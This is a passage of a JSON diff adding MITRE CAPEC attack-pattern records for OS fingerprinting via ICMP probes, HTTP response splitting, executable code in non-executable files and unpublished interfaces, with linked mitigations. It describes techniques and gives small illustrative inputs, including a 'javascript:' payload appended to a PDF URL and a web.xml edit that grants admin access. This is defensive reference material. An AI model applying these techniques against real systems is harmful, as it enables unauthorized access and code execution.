"Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n RFC1122 specifies that the Header of the request must be echoed back when an error is sent in response, but some operating systems and firmware alter the integrity of the original header. Non-standard ICMP/IP implementations result in response that are useful for individuating remote operating system or router firmware versions. There are four general response types that can be used to distinguish operating systems apart: 1) the IP total length field may be calculated correctly, 2) an operating system may add 20 or more additional bytes to the length calculation, 3) the operating system may subtract 20 or more bytes from the correct length of the field or 4) the IP total length field is calculated with any other incorrect value.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications. Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.\"" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary sends a UDP datagram having an assigned value to its internet identification field (ID) to a closed port on a target to observe the manner in which this bit is echoed back in the ICMP error message. This allows the attacker to construct a fingerprint of specific OS behaviors.", + "external_references": [ + { + "external_id": "CAPEC-332", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/332.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--e02f436a-486e-409a-adc6-a058c531f05f", + "modified": "2023-01-24T00:00:00.000Z", + "name": "ICMP IP 'ID' Field Error Message Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n The internet identification field (ID) is typically utilized for reassembling a fragmented packet. RFC791 and RFC815 discusses about IP datagrams, fragmentation and reassembly. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within the ICMP error message. There are three behaviors related to the IP ID field that can be used to distinguish remote operating systems or firmware: 1) it is echoed back identically to the bit order of the ID field in the original IP header, 2) it is echoed back, but the byte order has been reversed, or it contains an incorrect or unexpected value. Different operating systems will respond by setting the IP ID field differently within error messaging.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications. Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.\"" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary manipulates and injects malicious content, in the form of secret unauthorized HTTP responses, into a single HTTP response from a vulnerable or compromised back-end HTTP agent (e.g., web server) or into an already spoofed HTTP response from an adversary controlled domain/site.\n See CanPrecede relationships for possible consequences.\n ", + "external_references": [ + { + "external_id": "CAPEC-34", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/34.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-113", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/113.html" + }, + { + "external_id": "CWE-138", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/138.html" + }, + { + "external_id": "CWE-436", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/436.html" + }, + { + "description": "HTTP Response Splitting", + "external_id": "25", + "source_name": "WASC", + "url": "http://projects.webappsec.org/HTTP-Response-Splitting" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "HTTP Response Smuggling, Beyond Security", + "external_id": "REF-117", + "source_name": "reference_from_CAPEC", + "url": "http://www.securiteam.com/securityreviews/5CP0L0AHPC.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-617", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.html" + }, + { + "description": "Robert Auger, HTTP Response Splitting, 2010, The Web Application Security Consortium", + "external_id": "REF-680", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246931/HTTP%20Response%20Splitting" + } + ], + "id": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "modified": "2022-09-29T00:00:00.000Z", + "name": "HTTP Response Splitting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a", + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n In the PHP 5 session extension mechanism, a user-supplied session ID is sent back to the user within the Set-Cookie HTTP header. Since the contents of the user-supplied session ID are not validated, it is possible to inject arbitrary HTTP headers into the response body. This immediately enables HTTP Response Splitting by simply terminating the HTTP response header from within the session ID used in the Set-Cookie directive. See also: CVE-2006-0207\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey network to identify target: The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets

    2. Techniques
    Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer.

Experiment

  1. Identify vulnerabilities in targeted HTTP infrastructure and technologies: The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, HTTP headers, syntax checking and input filtering.

  2. Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities: The adversary sends maliciously crafted HTTP request to back-end HTTP infrastructure to inject adversary data (in the form of HTTP headers with custom strings and embedded web scripts and objects) into HTTP responses (intended for intermediary and/or front-end client/victim HTTP agents communicating with back-end HTTP infrastructure) for the purpose of interfering with the parsing of HTTP responses by intermediary and front-end client/victim HTTP agents. The intended consequences of the malicious HTTP request and the subsequent adversary injection and manipulation of HTTP responses to intermediary and front-end client/victim HTTP agents, will be observed to confirm applicability of identified vulnerabilities in the adversary's plan of attack.

    3. Techniques
    Continue the monitoring of HTTP traffic.
    \n Utilize different sequences of special characters (CR - Carriage Return, LF - Line Feed, HT - Horizontal Tab, SP - Space and etc.) to bypass filtering and back-end encoding and to embed:\n \n additional HTTP Requests with their own headers\n malicious web scripts into parameters of HTTP Request headers (e.g., browser cookies like Set-Cookie or Ajax web/browser object parameters like XMLHttpRequest)\n adversary chosen encoding (e.g., UTF-7)\n \n to utilize additional special characters (e.g., > and <) filtered by the target HTTP agent.\n Note that certain special characters and character encoding may be applicable only to intermediary and front-end agents with rare configurations or that are not RFC compliant.\n
    Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request.

Exploit

  1. Perform HTTP Response Splitting attack: Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.

    2. Techniques
    Leverage techniques identified in the Experiment Phase.
", + "x_capec_extended_description": "\n Malicious user input is injected into various standard and/or user defined HTTP headers within a HTTP Response through use of Carriage Return (CR), Line Feed (LF), Horizontal Tab (HT), Space (SP) characters as well as other valid/RFC compliant special characters, and unique character encoding.\n A single HTTP response ends up being split as two or more HTTP responses by the targeted client HTTP agent parsing the original maliciously manipulated HTTP response. This allows malicious HTTP responses to bypass security controls in order to implement malicious actions and provide malicious content that allows access to sensitive data and to compromise applications and users. This is performed by the abuse of interpretation and parsing discrepancies in different intermediary HTTP agents (load balancer, reverse proxy, web caching proxies, application firewalls, etc.) or client HTTP agents (e.g., web browser) in the path of the malicious HTTP responses.\n This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions as well as lack of syntax checking and filtering of user input in the HTTP agents receiving HTTP messages in the path.\n This differs from CAPEC-105 HTTP Request Splitting, which is usually an attempt to compromise a back-end HTTP agent via HTTP Request messages. HTTP Response Splitting is an attempt to compromise aclient agent (e.g., web browser)by sending malicious content in HTTP responses from back-end HTTP infrastructure.\n HTTP Smuggling (CAPEC-33 and CAPEC-273) is different from HTTP Splitting due to the fact it relies upon discrepancies in the interpretation of various HTTP Headers and message sizes and not solely user input of special characters and character encoding. HTTP Smuggling was established to circumvent mitigations against HTTP Request Splitting techniques.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_peer_of_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e" + ], + "x_capec_prerequisites": [ + "A vulnerable or compromised server or domain/site capable of allowing adversary to insert/inject malicious content that will appear in the server's response to target HTTP agents (e.g., proxies and users' web browsers).", + "Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.", + "HTTP headers capable of being user-manipulated.", + "HTTP agents running on HTTP/1.0 or HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses." + ], + "x_capec_resources_required": [ + "Tools capable of monitoring HTTP messages, and crafting malicious HTTP messages and/or injecting malicious content into HTTP messages." + ], + "x_capec_skills_required": { + "Medium": "Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1e771e5-938f-4d0e-932e-1692f77db9a1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3673e571-3d09-4ddf-9967-8a14983e4523", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64555d1a-a57e-49d9-b9f8-02c843ba1af5", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0622cdd8-6ce2-45fc-bfcc-19d3b91d4536", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38c9102d-b93d-4484-8efb-aa67b53572c8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--65a59d08-b52c-4c78-b802-6e65c65f02e5", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c7c66359-57b8-4f29-8d2b-5d5ef075f5f5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e76fd999-0f43-460b-95fb-cb047a2a7f4d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--23a58aa1-dfcb-4295-a673-b44c0cba6264", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5cc83b32-2b3e-41e5-94e8-2e2ea48bf660", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eed85688-d26a-4cec-8582-4ad1e158cdb3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d4993c4a-c91f-4a57-9f21-3fe59ccbe5c4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--50ea55ae-d8a8-4279-9dc9-05b6fb416b84", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d73cbb1d-c8db-4b8e-8ae6-32f0d436b1d5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2e15722-f07d-44db-b988-af501e0f1e13", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.", + "external_references": [ + { + "external_id": "CAPEC-35", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/35.html" + }, + { + "external_id": "CWE-94", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/94.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-95", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/95.html" + }, + { + "external_id": "CWE-97", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/97.html" + }, + { + "external_id": "CWE-272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/272.html" + }, + { + "external_id": "CWE-59", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/59.html" + }, + { + "external_id": "CWE-282", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/282.html" + }, + { + "external_id": "CWE-270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/270.html" + }, + { + "description": "Obfuscated Files or Information: HTML Smuggling", + "external_id": "T1027.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/006" + }, + { + "description": "Obfuscated Files or Information: Embedded Payloads", + "external_id": "T1027.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/009" + }, + { + "description": "Hide Artifacts: Resource Forking", + "external_id": "T1564.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1564/009" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Leverage Executable Code in Non-Executable Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Virtually any system that relies on configuration files for runtime behavior is open to this attack vector. The configuration files are frequently stored in predictable locations, so an attacker that can fingerprint a server process such as a web server or database server can quickly identify the likely locale where the configuration is stored. And this is of course not limited to server processes. Unix shells rely on profile files to store environment variables, search paths for programs and so on. If the aliases are changed, then a standard Unix \"cp\" command can be rerouted to \"rm\" or other standard command so the user's intention is subverted.", + "The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser.", + "\n Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/)\n http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here\n The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process.\n ", + "\n The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name \"public\" grants all users with the public role the ability to use the administration functionality.\n < security-constraint>Security processing rules for admin screens/admin/*POSTGETadministratorpublic\n \n \n \n The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb" + ], + "x_capec_prerequisites": [ + "The attacker must have the ability to modify non-executable files consumed by the target software." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server that publishes an over-privileged directory, program, or interface. Optionally, ability to capture output directly through synchronous communication or other method such as FTP." + ], + "x_capec_skills_required": { + "Low": "To identify and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1200590e-b7be-4a04-ba62-ad7e096eb725", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8bc84555-2eda-4653-91db-ab12268de92f", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "spec_version": "2.1", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56425426-27c4-48cd-b76a-d1b3019fa7ab", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "spec_version": "2.1", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement host integrity monitoring to detect any unwanted altering of configuration files.", + "id": "course-of-action--601142e9-0c7b-4920-a60c-6abe2514f692", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-35-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a6e454f6-6551-4cd7-9eab-0d1493966d59", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--601142e9-0c7b-4920-a60c-6abe2514f692", + "spec_version": "2.1", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure that files that are not required to execute, such as configuration files, are not over-privileged, i.e. not allowed to execute.", + "id": "course-of-action--2e6ab888-a935-4b5d-9efa-891f4cdf1b32", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-35-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--96960c02-bdf9-412d-94b3-3cc4487c9b4f", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e6ab888-a935-4b5d-9efa-891f4cdf1b32", + "spec_version": "2.1", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary searches for and invokes interfaces or functionality that the target system designers did not intend to be publicly available. If interfaces fail to authenticate requests, the attacker may be able to invoke functionality they are not authorized for.", + "external_references": [ + { + "external_id": "CAPEC-36", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/36.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-695", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/695.html" + }, + { + "external_id": "CWE-1242", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1242.html" + } + ], + "id": "attack-pattern--d0db3641-ee0d-4897-89aa-3c85c69377a5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Unpublished Interfaces or Functionality", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f4186110-0c20-42fa-bc6f-d0ff9f700f91" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "To an extent, Google services (such as Google Maps) are all well-known examples. Calling these services, or extending them for one's own (perhaps very different) purposes is as easy as knowing they exist. Their unencumbered public use, however, is a purposeful aspect of Google's business model. Most organizations, however, do not have the same business model. Organizations publishing services usually fall back on thoughts that Attackers \"will not know services exist\" and that \"even if they did, they wouldn't be able to access them because they're not on the local LAN.\" Simple threat modeling exercises usually uncovers simple attack vectors that can invalidate these assumptions." + ], 